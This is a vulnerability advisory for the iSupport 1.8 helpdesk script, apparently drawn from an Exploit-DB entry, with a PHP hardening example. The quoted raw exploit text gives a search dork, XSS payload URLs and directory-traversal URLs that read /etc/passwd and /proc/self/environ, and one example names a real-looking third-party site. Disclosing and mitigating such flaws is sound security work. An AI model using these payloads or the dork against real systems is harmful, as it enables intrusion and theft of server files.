Vendor: iSupport
By: Stink' & Essandre
CVSS: 8.8 (HIGH)
Cross-Site Scripting (XSS) and Local File Inclusion (LFI)
CWE: 79 (XSS) and 22 (LFI)
Product Name: iSupport
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: No
Related CWE: N/A
CPE: a:idevspot:isupport:1.8
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: All
2009

iSupport <= 1.8 XSS/Local File Include Exploit

iSupport version 1.8 is vulnerable to Cross-Site Scripting (XSS) and Local File Inclusion (LFI). The which parameter of index.php and function.php, and the fields of the ticket submission form, accept JavaScript that is then executed in the victim's browser. The include_file parameter of index.php accepts a path, which lets an attacker read sensitive files from the server.

Mitigation:

The vulnerability can be mitigated by validating user input and sanitizing it before processing.
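
One way to apply this mitigation to the two parameters named in the advisory, as an added example that is not iSupport's own code: include_file is checked against a fixed allow-list and which is HTML-encoded on output. The page names come from the advisory's URLs; PAGE_DIR, resolve_page() and h() are hypothetical names chosen for the example.

```php
<?php
// Added example, not iSupport source code. Hardened handling of the two
// parameters named in the advisory: include_file (LFI) and which (XSS).

// Allow-list of includable pages. The two names are taken from the advisory's
// URLs; a real deployment would list every legitimate page (assumption).
const ALLOWED_PAGES = ['knowledgebase_list.php', 'ticket_submit.php'];
const PAGE_DIR = __DIR__ . '/pages';   // hypothetical directory layout

// Return the absolute path of a permitted page, or null if the request
// is not on the allow-list or resolves outside PAGE_DIR.
function resolve_page(string $requested): ?string
{
    if (!in_array($requested, ALLOWED_PAGES, true)) {
        return null;                   // rejects traversal paths and anything unlisted
    }
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $requested);
    // Defence in depth: the resolved path must stay inside the page directory
    // (catches symlinks or a mistaken allow-list entry).
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Encode a user-supplied value for an HTML body or quoted-attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Request handling (index.php). Array-valued parameters fail the is_string checks.
$page   = $_GET['include_file'] ?? 'knowledgebase_list.php';
$which  = $_GET['which'] ?? '';
$which  = is_string($which) ? $which : '';
$target = is_string($page) ? resolve_page($page) : null;

if ($target === null) {
    http_response_code(404);
    exit('Page not found');
}
// Inside the included page, echo request data only through h(), e.g. echo h($which);
include $target;
```

The same h() call belongs wherever stored ticket fields such as Subject and Comments are rendered, since those values reach other users' browsers after submission.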
Source

Exploit-DB raw data:

---------------------------------------------
++ iSupport <= 1.8 ++
XSS/Local File Include Exploit
---------------------------------------------


Discovered by : Stink' & Essandre
DATE : 16/12/09

//////////////////////////////////////////////////////////////////////

Website : http://www.idevspot.com/
DEMO : http://www.idevspot.com/demo/iSupport/
DOWNLOAD : http://www.idevspot.com/iSupport.php => $

//////////////////////////////////////////////////////////////////////


[+] Vulnerability and Exploitation

Dork : "Powered by [ iSupport 1.8 ]"


--[XSS]--

http://[TARGET]/[PATH]/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=[XSS]
http://[TARGET]/[PATH]/function.php?which=[XSS]

Example :
http://server/helpdesk/index.php?include_file=knowledgebase_list.php&x_category=PARENT_CATEGORY&which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E
http://server/helpdesk/function.php?which=%3Cscript%3Ealert%28/XSS/.source%29%3C/script%3E

--[XSS]-- in the member zone

http://jvdominator.com/helpdesk/index.php?include_file=ticket_submit.php
The flaw is in the form.
In "Subject, Comments, etc. ..."
After clicking "Submit Ticket" you get your XSS alert :)

--[LFI]--

http://[TARGET]/[PATH]/index.php?include_file=[LFI]

Example :

http://server/helpdesk/index.php?include_file=../../../../../proc/self/environ
http://server/helpdesk/index.php?include_file=../../../../../etc/passwd


[+] Solution :

N/A

The flaw is secured on some sites, but we do not know whether it was the publisher or the people using the script who secured it.